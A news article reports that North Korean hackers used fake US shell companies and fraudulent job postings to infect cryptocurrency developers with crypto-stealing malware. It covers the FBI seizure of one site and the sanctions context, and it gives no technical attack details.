North Korean Hackers Target Crypto Developers With Malware Through Fake US Companies

North Korean hackers have established shell companies in the United States to target cryptocurrency developers, using these fake entities to distribute malware through fraudulent job postings. The hackers created three businesses: Blocknovas, Softglide, and Angeloper Agency. Blocknovas and Softglide were registered as legal entities, while Angeloper Agency was not. These companies were used to lure potential victims into clicking on malicious links, which then infected their computers with crypto-stealing malware.

The hackers employed a sophisticated attack strategy that involved social engineering tactics. They posted fake job listings on third-party websites, targeting crypto developers. During the job application process, an error message would appear, requiring the user to click, copy, and paste to fix it, which led to the malware infection. The malware used in this campaign included BeaverTail, Invisible Ferret, and OtterCookie. BeaverTail was used to steal information and facilitate further malware attacks, while Invisible Ferret and OtterCookie were designed to steal crypto keys and clipboard data.

The FBI seized Blocknovas’ website and warned visitors about the malicious activities being conducted through the site. The hackers used GitHub job listings and freelancer websites to find victims, and they employed AI-generated images to create profiles of fake employees for the shell companies. In some cases, the hackers stole images of real people and used AI image modifier tools to create subtly different versions of those images, adding a layer of sophistication to their operations.

This malware campaign has been ongoing since 2024, with known public victims. Silent Push, a threat analysis firm, identified two developers targeted by the campaign; one of them reportedly had their MetaMask wallet compromised. The Lazarus Group, a subgroup of North Korean hackers, is suspected to be behind this campaign. The group is known for some of the biggest cyber thefts in the Web3 space, including the Bybit $1.4 billion hack and the $600 million Ronin network hack. The hackers' ability to establish seemingly legitimate companies on U.S. soil highlights the challenges in combating cyber espionage activities.

American officials claim that this hacking activity is part of a broader pattern of North Korean hackers stealing funds to raise hard currency. The hackers are targeting cryptocurrency because the proceeds can be easily anonymized. The funds are used to support North Korea's nuclear programs. The strategy has been very successful, with many large-scale attacks occurring regularly. The Office of Foreign Assets Control (OFAC) has sanctioned North Korea for developing nuclear weapons, and any American business that works with North Korea is breaching these sanctions. This incident adds another layer of security concern for crypto investors, as the mechanisms that secure funds can also be used to secure a hacker’s stolen funds. There may be a greater demand for security experts in the crypto field to address the growing number of security breaches occurring.